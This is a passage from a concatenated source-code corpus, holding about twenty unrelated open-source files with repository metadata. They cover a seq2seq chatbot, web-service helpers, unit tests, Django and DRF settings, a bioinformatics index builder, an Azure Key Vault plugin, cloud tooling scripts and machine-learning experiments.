:return: the trimmed string
"""
if not (isinstance(s, unicode) or isinstance(s, str)):
return s
unistr = s.decode('utf8') if type(s) != unicode else s
unistr = unistr.strip()
if not unistr:
return ''
trimmed_str = []
if unistr[0] != ' ':
trimmed_str.append(unistr[0])
for ind in xrange(1, len(unistr) - 1):
prev_char = unistr[ind - 1] if len(trimmed_str) == 0 else trimmed_str[-1]
cur_char = unistr[ind]
maybe_trim = cur_char == ' '
next_char = unistr[ind + 1]
if not maybe_trim:
trimmed_str.append(cur_char)
else:
if is_unichar_englishnum(prev_char) and is_unichar_englishnum(next_char):
trimmed_str.append(cur_char)
else:
continue
if unistr[-1] != ' ':
trimmed_str.append(unistr[-1])
return ''.join(trimmed_str)
class Chatbot():
"""
answer an enquiry using trained seq2seq model
"""
def __init__(self, model_dir):
# Create model and load parameters.
self.session = tf.InteractiveSession()
self.model = self.create_model(self.session, model_dir, True)
self.model.batch_size = 1
# Load vocabularies.
vocab_path = os.path.join(FLAGS.data_dir, "vocab%d" % FLAGS.vocab_size)
self.vocab, self.rev_vocab = data_utils.initialize_vocabulary(vocab_path)
def create_model(self, session, model_dir, forward_only):
"""Create conversation model and initialize or load parameters in session."""
model = seq2seq_model.Seq2SeqModel(
FLAGS.vocab_size, FLAGS.vocab_size, _buckets,
FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm,
FLAGS.batch_size,
FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,
use_lstm=FLAGS.use_lstm,
forward_only=forward_only)
ckpt = tf.train.get_checkpoint_state(model_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
_LOGGER.info("Reading model parameters from %s" % ckpt.model_checkpoint_path)
model.saver.restore(session, ckpt.model_checkpoint_path)
_LOGGER.info("Read model parameter succeed!")
else:
raise ValueError(
"Failed to find legal model checkpoint files in %s" % model_dir)
return model
def generate_answer(self, enquiry):
# Get token-ids for the input sentence.
token_ids = data_utils.sentence_to_token_ids(enquiry, self.vocab, tokenizer.fmm_tokenizer)
if len(token_ids) == 0:
_LOGGER.error('lens of token ids of sentence %s is 0' % enquiry)
# Which bucket does it belong to?
bucket_id = min([b for b in xrange(len(_buckets))
if _buckets[b][0] > len(token_ids)])
# Get a 1-element batch to feed the sentence to the model.
encoder_inputs, decoder_inputs, target_weights = self.model.get_batch(
{bucket_id: [(token_ids, [])]}, bucket_id)
# Get output logits for the sentence.
_, _, output_logits = self.model.step(self.session, encoder_inputs,
decoder_inputs,
target_weights, bucket_id, True)
# This is a greedy decoder - outputs are just argmaxes of output_logits.
outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits]
# If there is an EOS symbol in outputs, cut them at that point.
if tokenizer.EOS_ID in outputs:
outputs = outputs[:outputs.index(tokenizer.EOS_ID)]
# Print out response sentence corresponding to outputs.
answer = " ".join([self.rev_vocab[output] for output in outputs])
if tokenizer._UNK in answer:
answer = random.choice(UNK_TOKEN_REPLACEMENT)
answer = trim(answer)
return answer
def close(self):
self.session.close()
if __name__ == "__main__":
m = Chatbot(SEQ2SEQ_MODEL_DIR + '/train/')
response = m.generate_answer(u'我知道你不知道我知道你不知道我说的是什么意思')
print response
|
app/services/articles.py | StanislavRud/api-realword-app-test | 1,875 | 21477 | <filename>app/services/articles.py<gh_stars>1000+
from slugify import slugify
from app.db.errors import EntityDoesNotExist
from app.db.repositories.articles import ArticlesRepository
from app.models.domain.articles import Article
from app.models.domain.users import User
async def check_article_exists(articles_repo: ArticlesRepository, slug: str) -> bool:
try:
await articles_repo.get_article_by_slug(slug=slug)
except EntityDoesNotExist:
return False
return True
def get_slug_for_article(title: str) -> str:
return slugify(title)
def check_user_can_modify_article(article: Article, user: User) -> bool:
return article.author.username == user.username
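# --- Editor's note: illustrative sketch appended to the original module. ---
# Quick sanity check for the synchronous helpers only; check_article_exists is
# async and needs a database-backed ArticlesRepository, so it is not exercised
# here. The title below is an arbitrary example value.
if __name__ == "__main__":
    print(get_slug_for_article("How to train your dragon"))  # how-to-train-your-dragon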
|
tests/unit/schemas/test_base_schema_class.py | gamechanger/dusty | 421 | 21524 | from unittest import TestCase
from schemer import Schema, Array, ValidationException
from dusty.schemas.base_schema_class import DustySchema, DustySpecs
from ...testcases import DustyTestCase
class TestDustySchemaClass(TestCase):
def setUp(self):
self.base_schema = Schema({'street': {'type': basestring},
'house_number': {'type': int, 'default': 1}})
self.bigger_schema = Schema({'address': {'type': self.base_schema, 'default': {}},
'first_name': {'type': basestring, 'required': True},
'last_name': {'type': basestring, 'default': 'johnson'}})
def test_init_invalid_doc(self):
doc = {'street': 'dogstoon',
'house_number': '1'}
with self.assertRaises(ValidationException):
DustySchema(self.base_schema, doc)
def test_valid_doc(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(dusty_schema['street'], 'dogstoon')
self.assertEquals(dusty_schema['house_number'], 1)
def test_setting_defaults(self):
doc = {'street': 'dogstoon'}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(dusty_schema['street'], 'dogstoon')
self.assertEquals(dusty_schema['house_number'], 1)
def test_setting_defaults_more_complicated_1(self):
doc = {'first_name': 'dusty'}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertEquals(dusty_schema['first_name'], 'dusty')
self.assertEquals(dusty_schema['last_name'], 'johnson')
self.assertEquals(dusty_schema['address'], {'house_number': 1})
def test_setting_defaults_more_complicated_2(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertEquals(dusty_schema['address']['street'], 'dogstoon')
self.assertEquals(dusty_schema['address']['house_number'], 1)
def test_in_1(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertTrue('first_name' in dusty_schema)
def test_in_2(self):
doc = {'first_name': 'dusty',
'address': {'street': 'dogstoon'}}
dusty_schema = DustySchema(self.bigger_schema, doc)
self.assertFalse('first_names' in dusty_schema)
def test_keys(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(set(['street', 'house_number']), set(dusty_schema.keys()))
def test_values(self):
doc = {'street': 'dogstoon',
'house_number': 1}
dusty_schema = DustySchema(self.base_schema, doc)
self.assertEquals(set(['dogstoon', 1]), set(dusty_schema.values()))
class TestDustySpecsClass(DustyTestCase):
def test_finds_app_or_lib(self):
specs = DustySpecs(self.temp_specs_path)
self.assertEquals(specs.get_app_or_lib('app-a'), specs['apps']['app-a'])
self.assertEquals(specs.get_app_or_lib('lib-a'), specs['libs']['lib-a'])
def test_raises_without_app_or_lib(self):
specs = DustySpecs(self.temp_specs_path)
with self.assertRaises(KeyError):
specs.get_app_or_lib('non-existant-thingy')
def test_get_app_or_service(self):
specs = DustySpecs(self.temp_specs_path)
self.assertEquals(specs.get_app_or_service('app-a'), specs['apps']['app-a'])
self.assertEquals(specs.get_app_or_service('service-a'), specs['services']['service-a'])
|
DEQModel/utils/debug.py | JunLi-Galios/deq | 548 | 21546 | import torch
from torch.autograd import Function
class Identity(Function):
@staticmethod
def forward(ctx, x, name):
ctx.name = name
return x.clone()
    @staticmethod
    def backward(ctx, grad):
import pydevd
pydevd.settrace(suspend=False, trace_only_current_thread=True)
grad_temp = grad.clone()
return grad_temp, None |
Configuration/ProcessModifiers/python/trackingMkFitTobTecStep_cff.py | Purva-Chaudhari/cmssw | 852 | 21568 | import FWCore.ParameterSet.Config as cms
# This modifier replaces the default pattern recognition with mkFit for tobTecStep
trackingMkFitTobTecStep = cms.Modifier()
|
Trakttv.bundle/Contents/Libraries/Shared/plugin/scrobbler/handlers/playing.py | disrupted/Trakttv.bundle | 1,346 | 21590 | from plugin.scrobbler.core import SessionEngine, SessionHandler
@SessionEngine.register
class PlayingHandler(SessionHandler):
__event__ = 'playing'
__src__ = ['create', 'pause', 'stop', 'start']
__dst__ = ['start', 'stop']
@classmethod
def process(cls, session, payload):
# Handle media change
if cls.has_media_changed(session, payload) and session.state in ['start', 'pause']:
yield 'stop', session.payload
# Handle current media
if cls.has_finished(session, payload):
if session.state in ['start', 'pause']:
yield 'stop', payload
elif session.state in ['create', 'pause', 'stop']:
yield 'start', payload
elif session.state == 'start':
yield None, payload
|
samples/features/sql-big-data-cluster/security/encryption-at-rest-external-key-provider/kms_plugin_app/custom_akv.py | aguzev/sql-server-samples | 4,474 | 21592 | <reponame>aguzev/sql-server-samples<filename>samples/features/sql-big-data-cluster/security/encryption-at-rest-external-key-provider/kms_plugin_app/custom_akv.py
# Placeholder for adding logic specific to application
# and backend key store.
#
import os
import json
import sys
from azure.identity import DefaultAzureCredential
from azure.keyvault.keys import KeyClient
from azure.keyvault.keys.crypto import CryptographyClient, EncryptionAlgorithm
# Append the current application path to sys path to be able to resolve local modules.
#
sys.path.append('.')
sys.path.append('./model')
from constants import ConfigurationConstants, Operations, CryptoConstants
import utils
from json_objects import EncryptDecryptRequest, JsonWebKeyResponse, EncryptDecryptResponse
def decrypt(request, json_key_attributes_dict, pin, version):
"""
This method will be called by the application entry point
for decrypting the payload.
    request.value has the encrypted payload (ciphertext)
    request.alg contains the padding algorithm used for decryption.
"""
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
crypto_client = CryptographyClient(key_vault_key, credential=credential)
decrypted_payload = crypto_client.decrypt(EncryptionAlgorithm.rsa_oaep, request.value)
response = EncryptDecryptResponse(decrypted_payload.plaintext)
return response
def encrypt(request, json_key_attributes_dict, pin, version):
"""
This method will be called by the application entry point
for encrypting the payload.
request.value has the plaintext payload
request.alg contains the padding algorithm for encryption.
"""
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
crypto_client = CryptographyClient(key_vault_key, credential=credential)
encrypted_payload = crypto_client.encrypt(EncryptionAlgorithm.rsa_oaep, request.value)
response = EncryptDecryptResponse(encrypted_payload.ciphertext)
return response
def get_key(json_key_attributes_dict, pin, version):
set_env(json_key_attributes_dict, pin)
credential = DefaultAzureCredential()
key_vault_key = get_akv_key(json_key_attributes_dict, credential)
    # JsonWebKeyResponse expects integer inputs and converts them to byte arrays.
    # However, the AKV SDK already provides byte arrays for Exponent and Modulus.
    # We will instantiate the object with a dummy value and then overwrite the
    # exponent and modulus values.
#
dummy_val = 1
key_response = JsonWebKeyResponse(1,1)
key_response.e = utils.urlsafe_b64encode_as_str(key_vault_key.key.e)
key_response.n = utils.urlsafe_b64encode_as_str(key_vault_key.key.n)
return key_response
def get_akv_key(json_key_attributes_dict, credential):
"""
Gets the AKV key object.
"""
if "vault_url" in json_key_attributes_dict:
vault_url = json_key_attributes_dict["vault_url"]
else:
raise KeyError('vault_url was expected in the parameters but not found')
if "keyname" in json_key_attributes_dict:
key_name = json_key_attributes_dict["keyname"]
else:
raise KeyError('keyname was expected in the parameters but not found')
if "keyversion" in json_key_attributes_dict:
key_version = json_key_attributes_dict["keyversion"]
else:
raise KeyError('keyversion was expected in the parameters but not found')
key_client = KeyClient(vault_url=vault_url, credential=credential)
key_vault_key = key_client.get_key(key_name, key_version)
return key_vault_key
def set_env(json_key_attributes_dict, pin):
"""
Sets the environment variables for the MS identity credential lookup to work.
"""
if "azure_client_id" in json_key_attributes_dict:
key_version = json_key_attributes_dict["azure_client_id"]
else:
raise KeyError('azure_client_id was expected in the parameters but not found')
if "azure_tenant_id" in json_key_attributes_dict:
key_version = json_key_attributes_dict["azure_tenant_id"]
else:
raise KeyError('azure_tenant_id was expected in the parameters but not found')
os.environ["AZURE_CLIENT_ID"]=json_key_attributes_dict["azure_client_id"]
os.environ["AZURE_TENANT_ID"]=json_key_attributes_dict["azure_tenant_id"]
os.environ["AZURE_CLIENT_SECRET"]=pin
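# --- Editor's note: illustrative sketch appended to the original module. ---
# These handlers are normally invoked by the KMS plugin entry point. The hedged
# harness below only shows the parameter shape this module itself reads; every
# value is a placeholder and must be replaced with a real Azure Key Vault URL,
# key name/version, tenant/client id and client secret before the call succeeds.
if __name__ == "__main__":
    demo_key_attributes = {
        "vault_url": "https://my-vault.vault.azure.net/",           # placeholder
        "keyname": "my-key",                                        # placeholder
        "keyversion": "0123456789abcdef0123456789abcdef",           # placeholder
        "azure_client_id": "00000000-0000-0000-0000-000000000000",  # placeholder
        "azure_tenant_id": "00000000-0000-0000-0000-000000000000",  # placeholder
    }
    demo_client_secret = os.environ.get("DEMO_AZURE_CLIENT_SECRET", "placeholder-secret")
    # get_key returns the public modulus/exponent of the key as a JsonWebKeyResponse.
    public_key = get_key(demo_key_attributes, demo_client_secret, version="1.0")
    print(public_key.n, public_key.e)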
|
data_managers/data_manager_gatk_picard_index_builder/data_manager/data_manager_gatk_picard_index_builder.py | supernord/tools-iuc | 142 | 21612 | <gh_stars>100-1000
#!/usr/bin/env python
# <NAME>.
# Uses fasta sorting functions written by <NAME>.
import json
import optparse
import os
import shutil
import subprocess
import sys
import tempfile
CHUNK_SIZE = 2**20
DEFAULT_DATA_TABLE_NAME = "fasta_indexes"
def get_id_name(params, dbkey, fasta_description=None):
# TODO: ensure sequence_id is unique and does not already appear in location file
sequence_id = params['param_dict']['sequence_id']
if not sequence_id:
sequence_id = dbkey
sequence_name = params['param_dict']['sequence_name']
if not sequence_name:
sequence_name = fasta_description
if not sequence_name:
sequence_name = dbkey
return sequence_id, sequence_name
def build_picard_index(data_manager_dict, fasta_filename, target_directory, dbkey, sequence_id, sequence_name, jar, data_table_name=DEFAULT_DATA_TABLE_NAME):
fasta_base_name = os.path.split(fasta_filename)[-1]
gatk_sorted_fasta_filename = os.path.join(target_directory, fasta_base_name)
shutil.copy(fasta_filename, gatk_sorted_fasta_filename)
_sort_fasta_gatk(gatk_sorted_fasta_filename)
sam_index_filename = '%s.fai' % gatk_sorted_fasta_filename
if not os.path.exists(sam_index_filename):
sam_command = ['samtools', 'faidx', gatk_sorted_fasta_filename]
_run_command(sam_command, target_directory)
args = ['java', '-jar', jar, 'R=%s' % gatk_sorted_fasta_filename, 'O=%s.dict' % sequence_id]
_run_command(args, target_directory)
data_table_entry = dict(value=sequence_id, dbkey=dbkey, name=sequence_name, path=fasta_base_name)
_add_data_table_entry(data_manager_dict, data_table_name, data_table_entry)
def _run_command(command, target_directory):
tmp_stderr = tempfile.NamedTemporaryFile(prefix="tmp-data-manager-gatk_picard_index_builder-stderr")
proc = subprocess.Popen(args=command, shell=False, cwd=target_directory, stderr=tmp_stderr.fileno())
return_code = proc.wait()
if return_code:
tmp_stderr.flush()
tmp_stderr.seek(0)
sys.stderr.write("Error building index:\n")
while True:
chunk = tmp_stderr.read(CHUNK_SIZE)
if not chunk:
break
sys.stderr.write(chunk)
sys.exit(return_code)
tmp_stderr.close()
def _add_data_table_entry(data_manager_dict, data_table_name, data_table_entry):
data_manager_dict['data_tables'] = data_manager_dict.get('data_tables', {})
data_manager_dict['data_tables'][data_table_name] = data_manager_dict['data_tables'].get(data_table_name, [])
data_manager_dict['data_tables'][data_table_name].append(data_table_entry)
return data_manager_dict
def _move_and_index_fasta_for_sorting(fasta_filename):
unsorted_filename = tempfile.NamedTemporaryFile().name
shutil.move(fasta_filename, unsorted_filename)
fasta_offsets = {}
with open(unsorted_filename) as unsorted_fh:
while True:
offset = unsorted_fh.tell()
line = unsorted_fh.readline()
if not line:
break
if line.startswith(">"):
line = line.split(None, 1)[0][1:]
fasta_offsets[line] = offset
current_order = [x[1] for x in sorted((x[1], x[0]) for x in fasta_offsets.items())]
return (unsorted_filename, fasta_offsets, current_order)
def _write_sorted_fasta(sorted_names, fasta_offsets, sorted_fasta_filename, unsorted_fasta_filename):
with open(unsorted_fasta_filename, 'rb') as unsorted_fh, open(sorted_fasta_filename, 'wb+') as sorted_fh:
for name in sorted_names:
offset = fasta_offsets[name]
unsorted_fh.seek(offset)
sorted_fh.write(unsorted_fh.readline())
while True:
line = unsorted_fh.readline()
if not line or line.startswith(b">"):
break
sorted_fh.write(line)
def _int_to_roman(integer):
if not isinstance(integer, int):
raise TypeError("expected integer, got %s" % type(integer))
if not 0 < integer < 4000:
raise ValueError("Argument must be between 1 and 3999, got %s" % str(integer))
ints = (1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1)
nums = ('M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I')
result = ""
for i in range(len(ints)):
count = int(integer / ints[i])
result += nums[i] * count
integer -= ints[i] * count
return result
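# A few hand-checkable examples for the converter above:
#   _int_to_roman(4)    -> 'IV'
#   _int_to_roman(22)   -> 'XXII'
#   _int_to_roman(1987) -> 'MCMLXXXVII'
#   _int_to_roman(0)    -> ValueError (argument must be between 1 and 3999)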
def _sort_fasta_gatk(fasta_filename):
(unsorted_filename, fasta_offsets, current_order) = _move_and_index_fasta_for_sorting(fasta_filename)
    # Preferred ordering: numeric contig names 1-99, then roman numerals, then X, Y, M
    sorted_names = list(map(str, range(1, 100))) + list(map(_int_to_roman, range(1, 100))) + ['X', 'Y', 'M']
# detect if we have chrN, or just N
has_chr = False
for chrom in sorted_names:
if "chr%s" % chrom in current_order:
has_chr = True
break
if has_chr:
sorted_names = ["chr%s" % x for x in sorted_names]
else:
sorted_names.insert(0, "MT")
sorted_names.extend(["%s_random" % x for x in sorted_names])
existing_sorted_names = []
for name in sorted_names:
# Append each chromosome only once.
if name in current_order and name not in existing_sorted_names:
existing_sorted_names.append(name)
for name in current_order:
# TODO: confirm that non-canonical names do not need to be sorted specially
if name not in existing_sorted_names:
existing_sorted_names.append(name)
if existing_sorted_names == current_order:
shutil.move(unsorted_filename, fasta_filename)
else:
_write_sorted_fasta(existing_sorted_names, fasta_offsets, fasta_filename, unsorted_filename)
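# Behavioural sketch (input names assumed): for records appearing on disk as
# ['chr10', 'chr2', 'chr1'], the 'chr' prefix is detected, so the preferred order
# chr1, chr2, ..., chrX, chrY, chrM (plus *_random variants) is applied; any name not in
# the preferred list keeps its original relative order and is appended afterwards, and the
# file is only rewritten when this differs from the existing order.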
def main():
parser = optparse.OptionParser()
parser.add_option('-f', '--fasta_filename', dest='fasta_filename', action='store', type="string", default=None, help='fasta_filename')
parser.add_option('-d', '--fasta_dbkey', dest='fasta_dbkey', action='store', type="string", default=None, help='fasta_dbkey')
parser.add_option('-t', '--fasta_description', dest='fasta_description', action='store', type="string", default=None, help='fasta_description')
parser.add_option('-n', '--data_table_name', dest='data_table_name', action='store', type="string", default=None, help='data_table_name')
parser.add_option('-j', '--jar', dest='jar', action='store', type="string", default=None, help='GATK .jar file')
(options, args) = parser.parse_args()
filename = args[0]
with open(filename) as fh:
params = json.load(fh)
target_directory = params['output_data'][0]['extra_files_path']
os.mkdir(target_directory)
data_manager_dict = {}
if options.fasta_dbkey in [None, '', '?']:
raise Exception('"%s" is not a valid dbkey. You must specify a valid dbkey.' % (options.fasta_dbkey))
sequence_id, sequence_name = get_id_name(params, dbkey=options.fasta_dbkey, fasta_description=options.fasta_description)
# build the index
build_picard_index(data_manager_dict,
options.fasta_filename,
target_directory,
options.fasta_dbkey,
sequence_id,
sequence_name,
options.jar,
data_table_name=options.data_table_name or DEFAULT_DATA_TABLE_NAME)
# save info to json file
with open(filename, 'w') as fh:
json.dump(data_manager_dict, fh, sort_keys=True)
if __name__ == "__main__":
main()
|
django_for_startups/django_customizations/drf_customizations.py | Alex3917/django_for_startups | 102 | 21613 | # Standard Library imports
# Core Django imports
# Third-party imports
from rest_framework import permissions
from rest_framework.throttling import UserRateThrottle, AnonRateThrottle
# App imports
class BurstRateThrottle(UserRateThrottle):
scope = 'burst'
class SustainedRateThrottle(UserRateThrottle):
scope = 'sustained'
class HighAnonThrottle(AnonRateThrottle):
rate = '5000000/day'
class AccountCreation(permissions.BasePermission):
""" A user should be able to create an account without being authenticated, but only the
owner of an account should be able to access that account's data in a GET method.
"""
def has_permission(self, request, view):
        return request.method == "POST" or request.user.is_authenticated
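# Minimal settings sketch showing how these classes would typically be wired up; the
# import path and the rate values are assumptions for illustration, not project settings:
#   REST_FRAMEWORK = {
#       'DEFAULT_THROTTLE_CLASSES': [
#           'myapp.drf_customizations.BurstRateThrottle',
#           'myapp.drf_customizations.SustainedRateThrottle',
#       ],
#       'DEFAULT_THROTTLE_RATES': {
#           'burst': '60/min',
#           'sustained': '1000/day',
#           'anon': '100/day',
#       },
#   }
# AccountCreation is then attached per view, e.g. permission_classes = [AccountCreation].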
|
communications/migrations/0002_auto_20190902_1759.py | shriekdj/django-social-network | 368 | 21619 | <reponame>shriekdj/django-social-network
# Generated by Django 2.2.4 on 2019-09-02 11:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('communications', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='message',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='author_messages', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='message',
name='friend',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='friend_messages', to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
tests/resources/test_codegen/template.py | come2ry/atcoder-tools | 313 | 21638 | <reponame>come2ry/atcoder-tools<filename>tests/resources/test_codegen/template.py
#!/usr/bin/env python3
import sys
def solve(${formal_arguments}):
return
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
${input_part}
solve(${actual_arguments})
if __name__ == '__main__':
main()
|
archived-stock-trading-bot-v1/utils/alerts.py | Allcallofduty10/stock-trading-bot | 101 | 21642 | import os
from sys import platform
def say_beep(n: int):
    for _ in range(n):
if platform == "darwin":
os.system("say beep")
|
test/PySrc/tools/collect_tutorials.py | lifubang/live-py-plugin | 224 | 21681 | import json
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, FileType
from pathlib import Path
def main():
parser = ArgumentParser(description='Collect markdown files, and write JSON.',
formatter_class=ArgumentDefaultsHelpFormatter)
project_path = Path(__file__).parent.parent.parent.parent
parser.add_argument('--source',
type=Path,
default=project_path / 'html' / 'tutorials')
parser.add_argument('--target',
type=FileType('w'),
default=str(project_path / 'html' / 'src' /
'tutorials.json'))
args = parser.parse_args()
tutorials = {}
# source_file: Path
for source_file in args.source.rglob('*.md'):
name = str(source_file.relative_to(args.source).with_suffix(''))
if name == 'README':
continue
source = source_file.read_text()
tutorials[name] = source
json.dump(tutorials, args.target)
main()
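# Sketch of the generated tutorials.json (hypothetical content): keys are markdown paths
# relative to --source with the .md suffix stripped, README files are skipped, values are
# the raw markdown text, e.g.
#   {"getting_started": "# Getting started\n...", "advanced/masking": "..."}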
|
aim/pytorch.py | avkudr/aim | 2,195 | 21718 | <reponame>avkudr/aim
# Alias to SDK PyTorch utils
from aim.sdk.adapters.pytorch import track_params_dists, track_gradients_dists # noqa
|
diagrams/alibabacloud/analytics.py | bry-c/diagrams | 17,037 | 21728 | <reponame>bry-c/diagrams
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _AlibabaCloud
class _Analytics(_AlibabaCloud):
_type = "analytics"
_icon_dir = "resources/alibabacloud/analytics"
class AnalyticDb(_Analytics):
_icon = "analytic-db.png"
class ClickHouse(_Analytics):
_icon = "click-house.png"
class DataLakeAnalytics(_Analytics):
_icon = "data-lake-analytics.png"
class ElaticMapReduce(_Analytics):
_icon = "elatic-map-reduce.png"
class OpenSearch(_Analytics):
_icon = "open-search.png"
# Aliases
|
test/python/echo_hi_then_error.py | WrkMetric/Python--NodeJS | 1,869 | 21732 | <reponame>WrkMetric/Python--NodeJS
print('hi')
raise Exception('fibble-fah') |
ansible/utils/check_droplet.py | louis-pre/NewsBlur | 3,073 | 21743 | <reponame>louis-pre/NewsBlur
import sys
import time
import digitalocean
import subprocess
def test_ssh(drop):
droplet_ip_address = drop.ip_address
result = subprocess.call(f"ssh -o StrictHostKeyChecking=no root@{droplet_ip_address} ls", shell=True)
if result == 0:
return True
return False
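# Illustrative use (assumes the droplet object exposes .ip_address and that the local SSH
# key is already authorised for root on the droplet):
#   if test_ssh(droplet):
#       print("droplet reachable over SSH")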
TOKEN_FILE = "/srv/secrets-newsblur/keys/digital_ocean.token"
droplet_name = sys.argv[1]
with open(TOKEN_FILE) as f:
token = f.read().strip()
manager = digitalocean.Manager(token=token)
timeout = 180
timer = 0
ssh_works = False
while not ssh_works:
if timer > timeout:
raise Exception(f"The {droplet_name} droplet was not created.")
droplets = [drop for drop in manager.get_all_droplets() if drop.name == droplet_name]
if droplets:
droplet = droplets[0]
print(f"Found the {droplet_name} droplet. IP address is {droplet.ip_address}. Testing ssh...")
ssh_works = test_ssh(droplet)
time.sleep(3)
timer += 3
print("Success!") |
tests/test_paddle.py | ankitshah009/MMdnn | 3,442 | 21772 | from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from conversion_imagenet import TestModels
from conversion_imagenet import is_paddle_supported
def get_test_table():
return { 'paddle' : {
'resnet50' : [
TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
TestModels.coreml_emit,
TestModels.keras_emit,
TestModels.mxnet_emit,
TestModels.pytorch_emit,
TestModels.tensorflow_emit
],
'resnet101' : [
#TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
TestModels.coreml_emit,
TestModels.keras_emit,
TestModels.mxnet_emit,
TestModels.pytorch_emit,
TestModels.tensorflow_emit
],
'vgg16' : [
TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
#TestModels.coreml_emit,
#TestModels.keras_emit,
#TestModels.mxnet_emit,
#TestModels.pytorch_emit,
#TestModels.tensorflow_emit
],
}}
def test_paddle():
if not is_paddle_supported():
return
    # omitting the tensorflow import here leads to a crash
import tensorflow as tf
test_table = get_test_table()
tester = TestModels(test_table)
tester._test_function('paddle', tester.paddle_parse)
if __name__ == '__main__':
test_paddle()
|
development_playgrounds/transformation_planar_flow_test.py | ai-di/Brancher | 208 | 21795 | <filename>development_playgrounds/transformation_planar_flow_test.py
import matplotlib.pyplot as plt
import numpy as np
import torch
from brancher.variables import ProbabilisticModel
from brancher.standard_variables import NormalVariable, DeterministicVariable, LogNormalVariable
import brancher.functions as BF
from brancher.visualizations import plot_density
from brancher.transformations import PlanarFlow
from brancher import inference
from brancher.visualizations import plot_posterior
# Model
M = 8
y = NormalVariable(torch.zeros((M,)), 1.*torch.ones((M,)), "y")
y0 = DeterministicVariable(y[1], "y0")
d = NormalVariable(y, torch.ones((M,)), "d")
model = ProbabilisticModel([d, y, y0])
# get samples
d.observe(d.get_sample(55, input_values={y: 1.*torch.ones((M,))}))
# Variational distribution
u1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u1", learnable=True)
w1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w1", learnable=True)
b1 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b1", learnable=True)
u2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u2", learnable=True)
w2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w2", learnable=True)
b2 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b2", learnable=True)
z = NormalVariable(torch.zeros((M, 1)), torch.ones((M, 1)), "z", learnable=True)
Qy = PlanarFlow(w2, u2, b2)(PlanarFlow(w1, u1, b1)(z))
Qy.name = "y"
Qy0 = DeterministicVariable(Qy[1], "y0")
#Qy._get_sample(4)[Qy].shape
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.5)
loss_list1 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
# Variational distribution
Qy = NormalVariable(torch.zeros((M,)), 0.5*torch.ones((M,)), "y", learnable=True)
Qy0 = DeterministicVariable(Qy[1], "y0")
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
number_iterations=400,
number_samples=100,
optimizer="Adam",
lr=0.01)
loss_list2 = model.diagnostics["loss curve"]
#Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
plt.plot(loss_list1)
plt.plot(loss_list2)
plt.show()
|
samples/archive/stream/stream.py | zzzDavid/heterocl | 236 | 21838 | import heterocl as hcl
hcl.init()
target = hcl.Platform.xilinx_zc706
initiation_interval = 4
a = hcl.placeholder((10, 20), name="a")
b = hcl.placeholder((10, 20), name="b")
c = hcl.placeholder((10, 20), name="c")
d = hcl.placeholder((10, 20), name="d")
e = hcl.placeholder((10, 20), name="e")
def add_mul(a, b, c, d, e):
@hcl.def_([a.shape, b.shape, c.shape])
def ret_add(a, b, c):
with hcl.for_(0, a.shape[0]) as i:
with hcl.for_(0, a.shape[1]) as j:
c[i, j] = a[i, j] + b[i, j]
@hcl.def_([c.shape, d.shape, e.shape])
def ret_mul(c, d, e):
# hcl.update(c, lambda x, y: a[x, y] * b[x, y], 'c_mul')
with hcl.for_(0, c.shape[0]) as i:
with hcl.for_(0, c.shape[1]) as j:
e[i, j] = c[i, j] * d[i, j]
ret_add(a, b, c)
ret_mul(c, d, e)
# compute customization
s = hcl.create_schedule([a, b, c, d, e], add_mul)
# op1 = add_mul.ret_add.c
# op2 = add_mul.ret_mul.c
# s[op1].pipeline(op1.axis[0], initiation_interval)
# stream into modules / device
a0, b0 = s.to([a, b], target.xcel)
d0 = s.to(d, target.xcel)
#s.partition(b0, dim=2, factor=2)
s.to([a0, b0], s[add_mul.ret_add])
